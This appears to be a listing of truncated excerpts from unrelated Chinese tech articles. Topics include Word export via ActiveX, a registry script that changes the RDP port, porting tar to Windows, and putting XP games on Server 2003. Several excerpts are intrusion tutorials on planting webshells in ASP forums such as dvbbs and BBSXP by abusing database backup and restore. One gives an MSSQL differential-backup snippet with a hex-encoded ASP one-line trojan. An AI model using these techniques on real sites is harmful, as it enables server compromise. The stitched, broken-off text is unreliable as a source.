最近有需求将数据导出到word里，然后编辑打印。想过几种方案：1.使用jacob。2.使用apache的poi。3.使用itext。由于时间比较紧，没多的时候去学习研究上述工具包，现在用javascript操作ActiveXObject控件，用替换word模板中的书签方式解决。前提条件：1.浏览器安全级别降低，可以使用ActiveXObject控件。2.装有office word。目前实现了替换单个书签，多行表格书签，和图片，基本上满足需求。不过还有很多操作word的使用方法不太清楚，网上大部分都使用的VB，有不清楚的地方，大家可以交流。下面说一下我的设计实现思路：首先当然是定义wo...

将下面代码存为.vbs，双击运行。然后重启一下系统，就修改了系统的远程桌面的默认的3389端口'#####################'VBS修改远程桌面的默认端口,并添加至Windows防火墙'作者51windows.Net'56868为要设置的端口'#####################Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Termina...

$False$...

遇一BBSXP后台:查看源文件.也没有value可以自定义.尝试修改上传类型.无奈不支持phpaspx.向数据库里插入一句话再备份.出现些XXX估计表里加入了什么东..访问:/bbs/Admin_fso.asp?menu=files&dir=../可以看到整站文件..找到一个文件名不常见的后台..运气不错.备份webshell之.....

作者:Jambalaya减少备份文件大小，得到可执行的webshell成功率提高不少一利用差异备份加一个参数WITHDIFFERENTIALdeclare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@screatetable[dbo].[xiaolu]([cmd][image]);insertintoxiaolu(cmd)values(0x3C2565786563757465287265717565737428226122...

 主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知，目前还有很多的asp程序后台存在这样的漏洞，利用方法大同小异。   php+mysql程序   ① 利用后台的数据查询功能   　　在有的程序后台提...

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!   里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们用一句话木马替换,然后把邮件地址导出为ASP的文件.我们就可以利用一句话木马客户端连接上去了.下面大家看我是怎么操作的!  &n...

减少备份文件大小，得到可执行的webshell成功率提高不少,一利用差异备份 加一个参数WITH DIFFERENTIAL declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s create table [dbo].[xiaolu]&n...

文章作者：喜欢忧伤 信息来源：邪恶八进制安全小组 背景： dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了 解决办法： 我把asp木马插入到数据库里，然后恢复。这样肯定检查肯定可以通过的。 具体过程： 前提： (偶以默认的安装情况为准，具体情况的把握靠自己了.) 你得到论坛dvbbs7.1后台。 1.偶已经作好一个数据库了：里面插入了加密的asp后门[就是那个写马的后门] 同时已经修改名字成dvbbsToshell.gif(文章最后有...

　　一．前言　　Linux拥有丰富各种源代码资源,但是大部分代码在Windows平台情况是无法正常编译的。Windows平台根本无法直接利用这些源代码资源。如果想要使用完整的代码，就要做移植工作。因为C/C++Library的不同和其他的一些原因，移植C/C++代码是一项困难的工作。本文将以一个实际的例子（Tar）来说明如何把Linux代码移植到Windows平台上。移植过程将尽量少修改代码,以便代码的运行逻辑不会发生任何变动。保留绝大部分软件主要功能。　　二．准备工作　　Tar是Linux平台下面一个打包工具。移植这样一个程序到windows平台需要做那些工作呢？　　首先是一些准备工作，在W...

   虽然现在很多人都在玩CS、传奇、奇迹、三国等许许多多的大型游戏，但是同时仍然有很多朋友对Windows自带的扫雷、接龙等小游戏情有独钟，在工作之余扫扫雷也自有一番乐趣。可在WindowsServer2003中却没有了这些百玩不厌的小游戏，难道鱼与熊掌就不可兼得，为了2003就只能舍弃这些小游戏吗？经摸索，终于成功地将WindowsXP中的小游戏移植到了WindowsServer2003中，实现过程如下：　　提示：以下操作是以WindoswServer2003安装在C盘为例，你可以根据自己的实际情况改变文章中的盘符，否则会出错。　　1、将WindowsXP安装...